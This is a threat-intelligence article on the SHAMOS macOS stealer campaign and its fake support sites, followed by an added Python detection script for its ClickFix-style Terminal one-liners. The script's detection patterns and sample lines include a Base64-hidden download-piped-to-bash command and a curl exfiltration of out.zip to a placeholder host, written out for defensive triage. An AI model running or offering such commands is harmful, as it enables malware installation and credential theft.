macOS Users Under Threat: Malicious SHAMOS Malware Preying on False Support Websites to Siphon Login Details
A malware campaign targeting macOS users has been exposed, with over 300 customer environments compromised between June and August 2025. The malware in question, known as SHAMOS, is a variant of the Atomic macOS Stealer (AMOS).
The campaign lured its victims through malvertising: users who searched for common macOS troubleshooting fixes were served sponsored results pointing to sites such as mac-safer[.]com and rescue-mac[.]com. These sites posed as legitimate technical support resources, but their "fix" was the infection chain.
SHAMOS is deployed through a Bash script downloaded from hxxps://icloudservers[.]com/gm/install[.]sh. The script captures the user's password and then deploys the SHAMOS stealer, which harvests passwords, browser data, notes, and cryptocurrency wallets.
SHAMOS takes several steps to evade detection. Before running its payload it strips the extended file attributes from the downloaded binary (the com.apple.quarantine attribute is what Gatekeeper checks, so removing it lets the file run without a prompt), marks the file executable, and performs anti-virtual-machine checks so that it does not detonate in an analysis sandbox. The fake support websites complete the chain by instructing the user to paste a Terminal command, Base64-encoded so its purpose is not obvious, that silently installs the malware.
The group behind SHAMOS is tracked as COOKIE SPIDER, which operates SHAMOS as malware-as-a-service and relies heavily on social engineering rather than exploits. One Google Ads advertiser profile promoting the spoofed websites impersonates a legitimate Australia-based electronics store, so the ads appear to come from an established business rather than a newly registered identity.
The "fix" the victim is told to run is the installer itself; executing the command starts the infection. Once installed, SHAMOS carries out host reconnaissance and data collection using AppleScript commands. The stolen data is packaged into a ZIP archive named "out.zip" and exfiltrated with curl to remote servers.
SHAMOS also establishes persistence by writing a Plist file named com[.]finder[.]helper[.]plist into the LaunchDaemons directory. LaunchDaemons are loaded as root, so this step only succeeds when the script has obtained sudo privileges; without them the malware still runs but does not persist this way.
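The behaviours described above (a Base64-encoded Terminal one-liner that pipes to a shell, quarantine-attribute stripping plus chmod +x, curl exfiltration of out.zip, and a com.finder.helper.plist LaunchDaemon) are all visible in process command lines. The following is an added example, not CrowdStrike's code or any artifact from the campaign: a small triage script that decodes Base64 layers in a command line and reports which of those indicators it contains. The regexes, the indicator names, and the sample command lines (which use the reserved example.invalid host) are constructed for illustration.

```python
"""Flag ClickFix-style macOS Terminal one-liners of the kind described above.

Added example, not CrowdStrike's code. Input: command lines as an EDR or
shell-history source would supply them. Output: the indicator names each
line triggers, including indicators found only after Base64 decoding.
"""
import base64
import re

# Runs of Base64 alphabet long enough to hide a command (20+ chars, optional padding).
B64_RE = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")

# Indicators drawn from the behaviours in the article; the regexes themselves are assumptions.
RULES = [
    ("pipe_to_shell", re.compile(r"\b(curl|wget)\b[^|;]*\|\s*(ba|z)?sh\b")),
    ("decode_to_shell", re.compile(r"\bbase64\s+(-d|-D|--decode)\b[^|;]*\|\s*(ba|z)?sh\b")),
    ("quarantine_strip", re.compile(r"\bxattr\s+(-c|-d\s+com\.apple\.quarantine)\b")),
    ("make_executable", re.compile(r"\bchmod\s+\+x\b")),
    ("exfil_zip", re.compile(r"\bcurl\b[^|;]*out\.zip")),
    ("launchdaemon_plist", re.compile(r"com\.finder\.helper\.plist|/LaunchDaemons/")),
]


def _looks_like_text(s):
    """True if a decoded blob is printable text rather than binary."""
    return bool(s.strip()) and all(c.isprintable() or c.isspace() for c in s)


def decode_base64_layers(cmd, max_depth=3):
    """Return [cmd, decoded layer 1, decoded layer 2, ...]: every printable string
    recovered by repeatedly decoding Base64 blobs found in the previous layer."""
    layers = [cmd]
    frontier = [cmd]
    for _ in range(max_depth):
        found = []
        for text in frontier:
            for blob in B64_RE.findall(text):
                padded = blob + "=" * (-len(blob) % 4)
                try:
                    decoded = base64.b64decode(padded, validate=True).decode("utf-8")
                except (ValueError, UnicodeDecodeError):
                    continue  # not Base64 after all (e.g. a long path), or decodes to binary
                if _looks_like_text(decoded):
                    found.append(decoded)
        if not found:
            break
        layers.extend(found)
        frontier = found
    return layers


def analyze(cmd):
    """Return the sorted indicator names a command line triggers at any decoding depth."""
    hits = set()
    for depth, text in enumerate(decode_base64_layers(cmd)):
        for name, rx in RULES:
            if rx.search(text):
                hits.add(name)
                if depth > 0:
                    hits.add("base64_obfuscated")  # indicator was hidden behind encoding
    return sorted(hits)


# Constructed sample command lines (not real campaign artifacts); example.invalid is reserved.
HIDDEN = b"curl -fsSL https://example.invalid/gm/install.sh | bash"
SAMPLES = {
    "clickfix_oneliner": "echo " + base64.b64encode(HIDDEN).decode() + " | base64 -d | bash",
    "quarantine_bypass": "xattr -c /tmp/Helper && chmod +x /tmp/Helper && /tmp/Helper",
    "exfiltration": "curl -X POST -F 'file=@/tmp/out.zip' https://example.invalid/upload",
    "persistence": "sudo cp /tmp/com.finder.helper.plist /Library/LaunchDaemons/",
    "benign": "git status && ls -la ~/Library/LaunchAgents",
}


def analyze_all(samples=SAMPLES):
    """Run analyze() over a mapping of name -> command line."""
    return {name: analyze(cmd) for name, cmd in samples.items()}


if __name__ == "__main__":
    for name, hits in analyze_all().items():
        print(f"{name:18} -> {hits or 'clean'}")
```

The decoding step matters more than any single regex: the pasted command in this campaign contains no obvious curl or download keyword until the Base64 layer is removed, so a rule that only inspects the raw command line sees an innocuous echo. Conversely, "curl | bash" alone will also fire on legitimate installers, so the pipe_to_shell hit is best treated as a triage signal to combine with the quarantine-strip and LaunchDaemons indicators rather than as a block-on-sight rule.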
The campaign was global, with victims across many countries; Russia was excluded from targeting.
CrowdStrike researchers, who uncovered the campaign, continue to investigate it and to help affected customers secure their systems. The practical advice for macOS users is specific: never paste a Terminal command from a website you did not already trust, and treat any command that decodes Base64 or pipes a download into a shell as hostile, because that one step is the entire infection chain here. Be wary of search results offering "support" for macOS errors, verify the authenticity of any downloads or websites before proceeding, and check /Library/LaunchDaemons for unfamiliar entries such as com[.]finder[.]helper[.]plist if a suspicious command has already been run.